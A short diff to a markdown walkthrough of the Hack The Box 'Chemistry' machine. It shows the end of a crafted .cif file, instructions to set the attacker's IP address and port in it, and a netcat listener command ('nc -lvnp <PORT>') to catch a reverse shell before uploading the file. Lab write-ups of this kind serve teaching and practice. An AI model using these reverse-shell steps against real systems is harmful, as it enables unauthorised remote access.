bilbobaggs/Phishing_Buddies/Walkthroughs/HTB/Chemistry/Chemistry.md

 _space_group_magn.name_BNS  "P  n'  m  a'  "
 ```

-Do not forget to change the "\<IPADDRESS\>/\<PORT\>" section to meet your needs.
+Do not forget to change the "\<IPADDRESS\>/\<PORT\>" section to meet your needs. \<IPADDRESS\> will match your ip address and \<PORT\> will match your listening port.
 Save this as a ".cif", but before uploading, it would be a good idea to start up your listener.
 To accomplish this open a terminal and ensure that netcat is installed.
 My typical use is:

 ```
 nc -lvnp <PORT>